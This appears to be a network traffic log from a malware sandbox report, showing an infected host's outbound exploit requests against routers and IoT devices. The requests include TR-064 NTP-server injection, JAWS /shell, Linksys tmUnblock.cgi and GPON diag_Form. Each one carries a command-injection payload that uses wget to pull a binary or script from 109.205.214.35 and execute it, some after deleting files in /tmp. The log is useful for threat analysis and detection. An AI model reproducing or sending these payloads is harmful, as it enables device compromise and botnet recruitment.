                                                        Mar 21, 2024 05:23:00.130698919 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:01.017724037 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:01.900242090 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.133809275.84.243.1047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.194263935 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.1353636113.29.211.7280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.227029085 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:00.573195934 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.1350694176.214.117.1647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.289377928 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.510723114 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:22:59 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.136015846.9.247.9780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.685035944 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:02.064232111 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:04.881330967 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.1343740185.221.98.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:01.521192074 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.135102642.188.34.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.667567968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.1338300109.89.70.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.667599916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.13350465.185.242.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668020010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.1340272109.183.133.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668028116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.135065242.23.113.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668028116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.1341452109.213.116.136443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668059111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.1338220212.7.237.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668067932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.135270842.125.203.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668071032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.1356074109.244.61.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668072939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.135711242.85.179.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668101072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.1360984212.40.131.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668155909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.13469505.190.128.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668586969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.135131642.19.69.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668591022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.1343758212.106.239.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.668658972 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.13605325.175.29.11580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.761107922 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:03.343329906 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
